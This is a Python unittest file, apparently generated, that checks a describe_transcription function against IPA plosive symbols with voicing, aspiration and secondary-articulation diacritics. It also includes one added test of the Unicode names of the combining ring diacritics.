# voiced aspirated labialized bilabial plosive pulmonic egressive consonant
def test_bʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰʷ")
self.assertEqual(actual, expected)
def test_b̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰʷ")
self.assertEqual(actual, expected)
def test_p̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial plosive pulmonic egressive consonant
def test_bʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰʲ")
self.assertEqual(actual, expected)
def test_b̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰʲ")
self.assertEqual(actual, expected)
def test_p̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial plosive pulmonic egressive consonant
def test_bʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰˠ")
self.assertEqual(actual, expected)
def test_b̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰˠ")
self.assertEqual(actual, expected)
def test_p̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant
def test_bʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰˤ")
self.assertEqual(actual, expected)
def test_b̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰˤ")
self.assertEqual(actual, expected)
def test_p̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar plosive pulmonic egressive consonant
def test_t_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t")
self.assertEqual(actual, expected)
def test_t̊_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊")
self.assertEqual(actual, expected)
def test_t̥_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥")
self.assertEqual(actual, expected)
def test_d̊_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊")
self.assertEqual(actual, expected)
def test_d̥_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar plosive pulmonic egressive consonant
def test_tʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʷ")
self.assertEqual(actual, expected)
def test_t̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ʷ")
self.assertEqual(actual, expected)
def test_t̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ʷ")
self.assertEqual(actual, expected)
def test_d̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʷ")
self.assertEqual(actual, expected)
def test_d̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar plosive pulmonic egressive consonant
def test_tʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʲ")
self.assertEqual(actual, expected)
def test_t̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ʲ")
self.assertEqual(actual, expected)
def test_t̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ʲ")
self.assertEqual(actual, expected)
def test_d̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʲ")
self.assertEqual(actual, expected)
def test_d̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar plosive pulmonic egressive consonant
def test_tˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tˠ")
self.assertEqual(actual, expected)
def test_t̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ˠ")
self.assertEqual(actual, expected)
def test_t̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ˠ")
self.assertEqual(actual, expected)
def test_d̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ˠ")
self.assertEqual(actual, expected)
def test_d̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar plosive pulmonic egressive consonant
def test_tˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tˤ")
self.assertEqual(actual, expected)
def test_t̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ˤ")
self.assertEqual(actual, expected)
def test_t̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ˤ")
self.assertEqual(actual, expected)
def test_d̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ˤ")
self.assertEqual(actual, expected)
def test_d̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar plosive pulmonic egressive consonant
def test_tʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰ")
self.assertEqual(actual, expected)
def test_d̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰ")
self.assertEqual(actual, expected)
def test_d̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar plosive pulmonic egressive consonant
def test_tʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰʷ")
self.assertEqual(actual, expected)
def test_d̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰʷ")
self.assertEqual(actual, expected)
def test_d̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant
def test_tʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰʲ")
self.assertEqual(actual, expected)
def test_d̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰʲ")
self.assertEqual(actual, expected)
def test_d̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar plosive pulmonic egressive consonant
def test_tʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰˠ")
self.assertEqual(actual, expected)
def test_d̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰˠ")
self.assertEqual(actual, expected)
def test_d̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant
def test_tʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʰˤ")
self.assertEqual(actual, expected)
def test_d̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʰˤ")
self.assertEqual(actual, expected)
def test_d̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar plosive pulmonic egressive consonant
def test_d_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d")
self.assertEqual(actual, expected)
def test_t̬_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬")
self.assertEqual(actual, expected)
def test_t̬_is_the_representation_of_the_voiced_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar plosive pulmonic egressive consonant
def test_dʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʷ")
self.assertEqual(actual, expected)
def test_t̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʷ")
self.assertEqual(actual, expected)
def test_t̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar plosive pulmonic egressive consonant
def test_dʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʲ")
self.assertEqual(actual, expected)
def test_t̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʲ")
self.assertEqual(actual, expected)
def test_t̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar plosive pulmonic egressive consonant
def test_dˠ_is_the_representation_of_the_voiced_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dˠ")
self.assertEqual(actual, expected)
def test_t̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar plosive pulmonic egressive consonant
def test_dˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dˤ")
self.assertEqual(actual, expected)
def test_t̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar plosive pulmonic egressive consonant
def test_dʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰ")
self.assertEqual(actual, expected)
def test_d̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰ")
self.assertEqual(actual, expected)
def test_t̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar plosive pulmonic egressive consonant
def test_dʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰʷ")
self.assertEqual(actual, expected)
def test_d̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰʷ")
self.assertEqual(actual, expected)
def test_t̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar plosive pulmonic egressive consonant
def test_dʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰʲ")
self.assertEqual(actual, expected)
def test_d̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰʲ")
self.assertEqual(actual, expected)
def test_t̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar plosive pulmonic egressive consonant
def test_dʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰˠ")
self.assertEqual(actual, expected)
def test_d̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰˠ")
self.assertEqual(actual, expected)
def test_t̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant
def test_dʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("dʰˤ")
self.assertEqual(actual, expected)
def test_d̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̬ʰˤ")
self.assertEqual(actual, expected)
def test_t̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex plosive pulmonic egressive consonant
def test_ʈ_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ")
self.assertEqual(actual, expected)
def test_ʈ̊_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊")
self.assertEqual(actual, expected)
def test_ʈ̥_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥")
self.assertEqual(actual, expected)
def test_ɖ̊_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊")
self.assertEqual(actual, expected)
def test_ɖ̥_is_the_representation_of_the_voiceless_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥")
self.assertEqual(actual, expected)
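# Editorial sketch, not part of the generated suite: the two voiceless
# diacritics exercised above are distinct code points, U+0325 COMBINING RING
# BELOW and U+030A COMBINING RING ABOVE (the ring above is used where a
# descender, as in ɖ or ɟ, would collide with a mark below). A minimal check:
def test_voiceless_diacritics_are_distinct_code_points(self):
    import unicodedata
    self.assertEqual(unicodedata.name("\u0325"), "COMBINING RING BELOW")
    self.assertEqual(unicodedata.name("\u030A"), "COMBINING RING ABOVE")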
# voiceless labialized retroflex plosive pulmonic egressive consonant
def test_ʈʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʷ")
self.assertEqual(actual, expected)
def test_ʈ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ʷ")
self.assertEqual(actual, expected)
def test_ʈ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ʷ")
self.assertEqual(actual, expected)
def test_ɖ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʷ")
self.assertEqual(actual, expected)
def test_ɖ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex plosive pulmonic egressive consonant
def test_ʈʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʲ")
self.assertEqual(actual, expected)
def test_ʈ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ʲ")
self.assertEqual(actual, expected)
def test_ʈ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ʲ")
self.assertEqual(actual, expected)
def test_ɖ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʲ")
self.assertEqual(actual, expected)
def test_ɖ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex plosive pulmonic egressive consonant
def test_ʈˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈˠ")
self.assertEqual(actual, expected)
def test_ʈ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ˠ")
self.assertEqual(actual, expected)
def test_ʈ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ˠ")
self.assertEqual(actual, expected)
def test_ɖ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ˠ")
self.assertEqual(actual, expected)
def test_ɖ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex plosive pulmonic egressive consonant
def test_ʈˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈˤ")
self.assertEqual(actual, expected)
def test_ʈ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̊ˤ")
self.assertEqual(actual, expected)
def test_ʈ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̥ˤ")
self.assertEqual(actual, expected)
def test_ɖ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ˤ")
self.assertEqual(actual, expected)
def test_ɖ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex plosive pulmonic egressive consonant
def test_ʈʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰ")
self.assertEqual(actual, expected)
def test_ɖ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex plosive pulmonic egressive consonant
def test_ʈʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈʰʷ")
self.assertEqual(actual, expected)
def test_ɖ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̥ʰʷ")
self.assertEqual(actual, expected)
